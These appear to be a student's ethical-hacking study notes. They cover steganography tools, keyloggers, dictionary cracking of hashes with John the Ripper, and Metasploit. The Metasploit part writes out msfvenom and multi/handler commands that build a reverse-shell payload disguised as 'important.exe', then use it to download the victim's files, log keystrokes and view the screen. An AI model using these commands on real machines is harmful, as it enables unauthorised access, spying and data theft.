Today learnt about the concept of STEGANOGRAPHY , KEYLOGGERS and PASSWORD CRACKING :

Steganography can be assumed to be a technique to hide secret code in plain sight by usse of particular tools.
There are primarily three types of steganography :
1] Image Steganography - Carried out by modifying the pixels of an image to hide some data by overlapping pixel values.
Tools used - Openstego , QuickStego.

2] Document-based / White-space Steganography - Method of hiding information in the pdf , text files or word files.
Tools used - SNOW , Invisible Secrets.

3] Audio Steganography - Allows hiding of information in the audio files.
Tools used - DeepSound , MP3Stego.

Keyloggers can be defined as tools which are used to record keystrokes made on a particular device's keyboard.
Two types of Keyloggers are used :
1] Hardware Keyloggers - These are the keyloggers which are physically connected to the computer keyboard and computer.

2] Software Keyloggers - These are pieces of malicious software code (malware) which are installed and run at the background in a system without knowledge of user.

Password Cracking and Hashes :
Hash is the format in which the password is stored in the database.
There are multiple types of hashes currently being used for the purpose of protecting sensitive or confidential data.
Example - md5 , sha256 are most commonly used hashing algorithms currently.

To understand password cracking efficiently , one must have understanding of hashing algorithms.

Different types of attacks can be used for password cracking as follows :
1] Dictionary-based attack : Makes use of a pre-defined file consisting of all the commonly used passwords.
2] Rule-based attack : This attack is carried out using a set of rules used for increasing the efficiency of cracking an password.
3] Brute-force attack : In this technique , all types of permutations and combinations are used to crack a password and is the most effective passsword cracking technique.

PASSWORD CRACKING USING JOHN THE RIPPER TOOL :
--The passwords to be cracked are stored in the form of respective hashes based on the hashing algorithm used in an file with ".txt" extension.

--The kali machine comes with pre-installed John the Ripper tool and it also consists of a file containing all the commonly used passwords known as "rockyou.txt".

--Run the John tool using the command "john -h" , it shows all the possible use cases of John.

--Next unzip the "rockyou.txt" file using the command - 
  " sudo unzip rockyou.txt "

--Next use the below given command to crack the hash of the password 
  " sudo john --format=raw-sha256(format of the hash) --wordlist=/usr/share/wordlists/rockyou.txt hash.txt(file name consisting of password hash) "
    (/usr/share/wordlists/rockyou.txt) - This gives the location of the file to test against the given hash.   

If the hashing algorithm of the password is unknown then we can directly use the below command -
  " sudo john --show pass.txt "
  where pass.txt is the name of the file containing the hash of required password.

Next up learnt about the METASPLOIT tool which is used for the creation of payloads and exploits used in Ethical Hacking purposes.

Creation of payload using metasploit :
--In the terminal enter "msfconsole" to start the metaploit tool.

--Use the "search" keyword along with the type you need to search such as payload , exploit along with "platform" keyword for platform-specific exploit types.

--To create a payload use the following - 
  " msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip address of local host) LPORT=(enter a port number) -f exe > important.exe "
here , -p = payload. 
-f = file.
" windows/meterpreter/reverse_tcp " - this gives the specifications of the payload to be created.

--Now to test the payload , create a temporary server using 
  " python3 -m http.server 9000 "

--Next enter the command on the msfconsole 
  " use multi/handler " followed by , 
  " set payload windows/meterpreter/reverse_tcp" then , 
  " set lhost = () " then , 
  " set lport =() " then , 
  " exploit "

--Next download the payload on windows machine.
Once it is downloaded , wee can use diifernt commands to gather the information of the targeted host.
For this , we use a series of commands inside the metasploit - 
Use " ifconfig /all " , this will provide us info about th host.

--By using "ls" and "pwd" followed by "download" command we can easily access and download any file on host machine.

--By using "keyscan_start" , we can activate a keystroke sniffer which will help us to inspect the logs of keystrokes on host machine.
  Use "keyscan_dump" to display the log of keystroke sniffer.

--Using "scrrenshare" command we can get access directly to the screen of host machine.
